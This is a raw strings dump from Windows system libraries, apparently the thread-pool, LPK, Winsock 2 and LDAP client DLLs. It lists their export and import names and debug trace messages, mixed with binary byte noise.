CleanupGroupVFuncs = %p, TaskVFuncs = %p u!Vh$ Allocated Work %p TpAllocWork WorkReturn = %p, Callback = %p, Context = %p, CallbackEnviron = %p WjeV WjwV WjsV TpWaitForWork wSh< ThreadPool: attempt to terminate a worker thread via handle %p Contact the owner of the function calling Terminate/Exit thread. wVh< Executing Simple Work callback %p(%p, %p) wj}h u!Vh$ Allocated simple work %p; posting. TpSimpleTryPost wSh@ CleanupGroupMember = %p, CancelledCallbackCount = %d CleanupGroupMember = %p, CallbackCount = %d wjQhT TppCleanupGroupMemberInitialize CleanupGroupMember = %p, Context = %p, CallbackEnviron = %p, Flags = 0x%08x, VFuncs = %p wShL CleanupGroupMember = %p, RaiseIfAlreadyRaised = %hs TppCleanupGroupMemberDestroy wVWh TppCleanupGroupMemberCallbackProlog Instance = %p, CleanupGroupMember = %p Wait completed with _^[] us9] u99] [_^] _^[] _[^] ?u'3 VVVPWj VVVPWj ?u'd ;p(v @u5W3 t,Wj PWSj 9;u;j PWSj @w j _^[] s ;E @_^[] H +H, rG9U j^Yf; j]Yf; Q@[@ @j-Z@f; j]_f; @@f; j]Zf; SSSSS VW9] SSSSS YYGG j%Xf; dtIf itCf ot=f xt7f ctOHt Huqj-Xf; j-Xf; j+Xf; j0Xf; t>jXXf; YYj0[ )j+Xf; ou!j8Xf; j8Xf; pj X ?%uR QQQQQ PPPPP WWWWW f92t ^[_] ;p t PQVj @0VS @0VS PWWj F<[W HHt%Ht jWX] AU8C yL#C 8@@f Pjph j hx B8QP jXXf QjHZ QjHh 9J,tG N*^] QQSV OtyOtG SQPPP _[^] wv2V PPPj Vjx3 Xf9u tG9U t!9E AACCN 9_^[] Vh$7 8kLsEuS 2f;1u .sb_data j!Xf; _^[] uzjW tO9] tJ9^ ;HDs* ;BDs ;BPs 8RESCuB SVW3 tM9~ tH9~ _^[] Vu jW @0j(j @0VW _@^] $VWh u jW $SVW3 @0j(j @0j j RESC xWn6 Zb$/i Q9+# 4tC>K 0I{Q9+# xWn4B TtC>K ''WC" Zb$/ u@#' GWy" G5?W GO@A G]iz 2"&v )#_ck :*$ '97| ;$^i 2?ly zZ3 *MdI. ?pow sqrt atan !This program cannot be run in DOS mode. Rich .text `.data .rsrc @.reloc LPK.dll LpkDllInitialize LpkDrawTextEx LpkEditControl LpkExtTextOut LpkGetCharacterPlacement LpkGetTextExtentExPoint LpkInitialize LpkPSMTextOut LpkTabbedTextOut LpkUseGDIWidthCache ftsWordBreak u Vj _^[] whXp Fu$A@; Qh`p E0QR 9E$V SQRP w_^[ tpf9U wh@p PjXh PQRSW w[_^ (SV3 3Fhj 1FhS _^[] PhQR t 9w uK9M QWRP tr;M WRPQ Rh`p whL[ USP10.dll USER32.dll GDI32.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-Localization-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll ntdll.dll floor memset LdrFindResourceEx_U LdrAccessResource memcpy UnhandledExceptionFilter SetUnhandledExceptionFilter DisableThreadLibraryCalls GetUserDefaultLCID GetACP GetLocaleInfoW NlsGetCacheUpdateCount GlobalAlloc GlobalFree LocalFree LocalAlloc GetCurrentProcessId GetCurrentProcess TerminateProcess GetCurrentThreadId QueryPerformanceCounter LeaveCriticalSection EnterCriticalSection InitializeCriticalSectionAndSpinCount GetTickCount GetSystemTimeAsFileTime GetViewportOrgEx GetWindowOrgEx GetMapMode AnyLinkedFonts GetTextCharacterExtra SetMapMode TranslateCharsetInfo ExtTextOutW GetBkMode DeleteDC DeleteObject CreateCompatibleBitmap GetGlyphIndicesW GetCharABCWidthsW SelectObject CreateFontW SetTextColor SetBkColor GetBkColor CreateCompatibleDC GdiRealizationInfo GdiIsPlayMetafileDC GetObjectType SetWindowOrgEx GetLayout GetTextAlign GetTextExtentExPointWPri GdiSetLastError SetTextAlign GetWindowExtEx GetViewportExtEx SetViewportExtEx SetWindowExtEx CreateFontIndirectW GetObjectW GetCurrentObject SetViewportOrgEx SendMessageW SetProcessDefaultLayout GetKeyboardLayout CreateCaret EnableMenuItem CheckMenuItem GetClientRect GetKeyboardLayoutList SetWindowLongW GetWindowLongW MessageBeep SendMessageA InvalidateRect InflateRect GetSystemMetrics ScriptStringAnalyse ScriptRecordDigitSubstitution ScriptStringGetOrder ScriptGetFontProperties UspFreeMem ScriptApplyDigitSubstitution ScriptStringFree ScriptStringCPtoX ScriptStringOut ScriptStringXtoCP LpkPresent ScriptGetProperties ScriptIsComplex ScriptStringGetLogicalWidths UspAllocTemp UspAllocCache RSDS lpk.pdb !This program cannot be run in DOS mode. ]XRich .text `.data .rsrc @.reloc BqwW .qwWt w#{{w z{w7 p|wE }w86}w Y__^[ VW9E @_^[] j,h( )G3W WS2_32.dll FreeAddrInfoEx FreeAddrInfoExW FreeAddrInfoW GetAddrInfoExA GetAddrInfoExW GetAddrInfoW GetNameInfoW InetNtopW InetPtonW SetAddrInfoExA SetAddrInfoExW WPUCompleteOverlappedRequest WSAAccept WSAAddressToStringA WSAAddressToStringW WSAAdvertiseProvider WSAAsyncGetHostByAddr WSAAsyncGetHostByName WSAAsyncGetProtoByName WSAAsyncGetProtoByNumber WSAAsyncGetServByName WSAAsyncGetServByPort WSAAsyncSelect WSACancelAsyncRequest WSACancelBlockingCall WSACleanup WSACloseEvent WSAConnect WSAConnectByList WSAConnectByNameA WSAConnectByNameW WSACreateEvent WSADuplicateSocketA WSADuplicateSocketW WSAEnumNameSpaceProvidersA WSAEnumNameSpaceProvidersExA WSAEnumNameSpaceProvidersExW WSAEnumNameSpaceProvidersW WSAEnumNetworkEvents WSAEnumProtocolsA WSAEnumProtocolsW WSAEventSelect WSAGetLastError WSAGetOverlappedResult WSAGetQOSByName WSAGetServiceClassInfoA WSAGetServiceClassInfoW WSAGetServiceClassNameByClassIdA WSAGetServiceClassNameByClassIdW WSAHtonl WSAHtons WSAInstallServiceClassA WSAInstallServiceClassW WSAIoctl WSAIsBlocking WSAJoinLeaf WSALookupServiceBeginA WSALookupServiceBeginW WSALookupServiceEnd WSALookupServiceNextA WSALookupServiceNextW WSANSPIoctl WSANtohl WSANtohs WSAPoll WSAProviderCompleteAsyncCall WSAProviderConfigChange WSARecv WSARecvDisconnect WSARecvFrom WSARemoveServiceClass WSAResetEvent WSASend WSASendDisconnect WSASendMsg WSASendTo WSASetBlockingHook WSASetEvent WSASetLastError WSASetServiceA WSASetServiceW WSASocketA WSASocketW WSAStartup WSAStringToAddressA WSAStringToAddressW WSAUnadvertiseProvider WSAUnhookBlockingHook WSAWaitForMultipleEvents WSApSetPostRoutine WSCDeinstallProvider WSCEnableNSProvider WSCEnumProtocols WSCGetApplicationCategory WSCGetProviderInfo WSCGetProviderPath WSCInstallNameSpace WSCInstallNameSpaceEx WSCInstallProvider WSCInstallProviderAndChains WSCSetApplicationCategory WSCSetProviderInfo WSCUnInstallNameSpace WSCUpdateProvider WSCWriteNameSpaceOrder WSCWriteProviderOrder WahCloseApcHelper WahCloseHandleHelper WahCloseNotificationHandleHelper WahCloseSocketHandle WahCloseThread WahCompleteRequest WahCreateHandleContextTable WahCreateNotificationHandle WahCreateSocketHandle WahDestroyHandleContextTable WahDisableNonIFSHandleSupport WahEnableNonIFSHandleSupport WahEnumerateHandleContexts WahInsertHandleContext WahNotifyAllProcesses WahOpenApcHelper WahOpenCurrentThread WahOpenHandleHelper WahOpenNotificationHandleHelper WahQueueUserApc WahReferenceContextByHandle WahRemoveHandleContext WahWaitForNotification WahWriteLSPEvent __WSAFDIsSet accept bind closesocket connect freeaddrinfo getaddrinfo gethostbyaddr gethostbyname gethostname getnameinfo getpeername getprotobyname getprotobynumber getservbyname getservbyport getsockname getsockopt htonl htons inet_addr inet_ntoa inet_ntop inet_pton ioctlsocket listen ntohl ntohs recv recvfrom select send sendto setsockopt shutdown socket N`;M ~H_^ CKMVu4 j,hp4 u99} 9=pp RQWW tjVj` CKMWuI WVPV W95Hp 9=lp wh q Running WinSock 2.0 QQVW 9Nlt 9N`u Np9M wuF95pp ujWj QSW3 9=pp wWWj _^[] w_^[] tq9^ SVWt\ _^[] w_^[] @_^[ u49^@t/ v4!^@ 9_,vf ;G,r @@f; @@f; w_^3 u+SV w^[_ _^[] G4PV O<9] SVW3 ju _^[] SSSh Ph/Y u$9N8u Ph/Y WSPStartupEx _@^] !FL9FP^ vF9] 9[t( _^[] _u#V wYY^ protocol DRIVERS\ETC\ DataBasePath System\CurrentControlSet\Services\Tcpip\Parameters Ph|k _^[] %u.%u.%u.%u F<_^] F@_^] w=|' wWh< w=}' %d/%s wWh< w=}' %s/%s ^,WS [_^] ^,WS [_^] _^[] ^,WS [_^] u.SWSV w=|' t0Vj VW~ _^[] A(_] ;p(W ;x(| H(_^] F$98t NX;y Z\;Y |9SVW stWV CL9p 8;z$u ;z0t SSSh j(h@ uf!E ;>s< PhL8 jI WEVT CHAN| TTBL TEMP\ TEMP OPCO LEVL TASK KEYW EVNT WEVT( CHANt MAPS\ VMAP< VMAP VMAP< VMAPT TTBL TEMP< !This program cannot be run in DOS mode. Richa[ .text `.data .rsrc @.reloc qwn) qwPr qwA+qw -qw5 Y__^[ VW9E @_^[] QSVW dhTl; @_^[] =LBadt\S _=LFre LFre w_[^] hdhTlP VVVV SVW3 t$f9 FFJu t89E AACCN _^[] WLDAP32.dll LdapGetLastError LdapMapErrorToWin32 LdapUTF8ToUnicode LdapUnicodeToUTF8 ber_alloc_t ber_bvdup ber_bvecfree ber_bvfree ber_first_element ber_flatten ber_free ber_init ber_next_element ber_peek_tag ber_printf ber_scanf ber_skip_tag cldap_open cldap_openA cldap_openW ldap_abandon ldap_add ldap_addA ldap_addW ldap_add_ext ldap_add_extA ldap_add_extW ldap_add_ext_s ldap_add_ext_sA ldap_add_ext_sW ldap_add_s ldap_add_sA ldap_add_sW ldap_bind ldap_bindA ldap_bindW ldap_bind_s ldap_bind_sA ldap_bind_sW ldap_check_filterA ldap_check_filterW ldap_cleanup ldap_close_extended_op ldap_compare ldap_compareA ldap_compareW ldap_compare_ext ldap_compare_extA ldap_compare_extW ldap_compare_ext_s ldap_compare_ext_sA ldap_compare_ext_sW ldap_compare_s ldap_compare_sA ldap_compare_sW ldap_conn_from_msg ldap_connect ldap_control_free ldap_control_freeA ldap_control_freeW ldap_controls_free ldap_controls_freeA ldap_controls_freeW ldap_count_entries ldap_count_references Integer overflow while calculating size of encrypted packet EncryptMessage failed with 0x%x, security context is 0x%x Sending %d signed/sealed bytes with retval 0x%x, %d bytes of cleartext to go Shifting encryptbuffers by %d EncryptMessage returned 0x%x Signing/Sealing %d bytes of cleartext. wj _# wt"9 hLsec Actual number of decrypted bytes is %d Total size of inbound buffer is %d bytes CurrentMessageSize is %d bytes cbInboundCryptoBytesInLookasideList should be 0: it's actually %d bytes Don't have enough data to start decrypting. Waiting for %#010x bytes, currently have %#010x bytes. Adding a new entry to the lookaside list (size = %li) 9FDv#j ;NDr ui!E ;FDsZ tY=! wt&9 wt'9 ^d9] F8)E DsGetDcClose DsGetDcNext DsGetDcOpen wt ; WSSVS hLHst WSSVS u"hx Marking thread data entry for thread 0x%0lx as deleted YhLErrW 8hLAtrP Removing all per thread data entries that are marked as deleted wt#9 Platform is Windows Server Platform is Windows Professional Platform is Windows Personal Could not get any version information from GetVersionEx 0x%x Platform is windows NT prior to Windows 2000 Platform is windows 95/98 wPhL XSWPf wPhH wtR9 LDAP client failed GetProcAddress, error = 0x%x. Failed to get any scrambling/encrytion APIs Failed to set socket to nonblocking in LdapClientInitialize: %d Failed to connect socket to itself in LdapClientInitialize: %d Failed in getsockname in LdapClientInitialize: %d Failed to bind socket in LdapClientInitialize: %d Failed to create socket in LdapClientInitialize: %d LDAP Client initialized winsock. LDAP client failed to initialize Winsock, error = 0x%x. LDAP Client initializing Winsock. Using Strong Scrambling APIs (RtlEncryptMemory/RtlDecryptMemory) SystemFunction041 SystemFunction040 LDAP client failed to load ADVAPI32.DLL, error = 0x%x. Using Strong Scrambling APIs (CryptProtectMemory/CryptUnprotectMemory) LDAP client failed to load NTDLL.DLL, error = 0x%x. LDAP client failed to load Winsock, error = 0x%x. wt+9= Failed to allocate thread data entry for thread 0x%0lx Added thread data entry for thread 0x%0lx wt-9 wt/95 wt#9 LDAP client failed to initialize critical sections. LDAP Client API 32 initialization complete. LDAP Client API 32 initializing. LDAP client failed to create heap, error = 0x%x. LDAP client failed to allocate thread local storage, error = 0x%x. RVhl HrPeekTag ran out of data, length 0x%x, offset 0x%x. wt)95 wHrGetValueWithAlloc ran out of data, length 0x%x, offset 0x%x. HrGetValue received error of 0x%x from MultiByteToWideChar. HrGetBinaryValue expected tag of 0x%x, received 0x%x. HrAddValue received error of 0x%x from WideCharToMultiByte. ldap_modify connection 0x%x send with error of 0x%x. ber_alloc_t could not allocate BerElement structure Successfully connected to host '%S' LdapParallelConnect connection 0x%x: socket close failed with error 0x%x. LDAP connection %u setsockopt for keepalive returned 0x%x ldap_search connection 0x%x trouble with SControl, error 0x%x. ldap_search connection 0x%x couldn't allocate request. 1.2.840.113556.1.4.319 Getting data for connection 0x%x instead of 0x%x LdapParseResult couldn't decode message for connection 0x%x, result 0x%x. LdapWaitForResponseFromServer: reconnect returned 0x%x for 0x%x HandleReferral error 0x%x while decoding referral for 0x%x ldap_get_values had decoding error of 0x%x . ldap_get_values_len had decoding error of 0x%x . LDAP failed GetProcAddress for InitSecurityInterface, error = 0x%x. SendLdapAbandon connection 0x%x could not allocate unbind. SendLdapAbandon connection 0x%x send with error of 0x%x. QQW3 jYXWP jPXWP f;FTs hLUni hLUni wty9 t`Ph wtP9 t7Ph wt'9 ldap_add attrlist 6 encoding error of 0x%x. ldap_add attrlist 5 encoding error of 0x%x. ldap_add attrlist 4 encoding error of 0x%x. ldap_add attrlist 3 encoding error of 0x%x. ldap_add attrlist 2 encoding error of 0x%x. hLUni hLAnsP hLMVbP tAhLMVa hLUni hLAns hLMVa hLAtMV _^hLAtM wt)9 SjZW 9] t PWh| PWhD wtd9 tIPWh wt+9 wt]9 tCVWh 9Xht! hLsec wt&9= TearDownSecureConnection win32 error is 0x%x TearDownSecureConnection: DecryptMessage returns 0x%x TearDownSecureConnection:ApplyControlToken returned 0x%x hLHstVj _^[] VWhT WjZV t99= t*9= wtd9= tKPVh tC9= wt)9= t&9{ht! [_^] ldap_delete connection 0x%x send with error of 0x%x. ldap_delete DN conn 0x%x encoding error of 0x%x. ldap_delete MsgNo conn 0x%x encoding error of 0x%x. ldap_delete startWrite conn 0x%x enco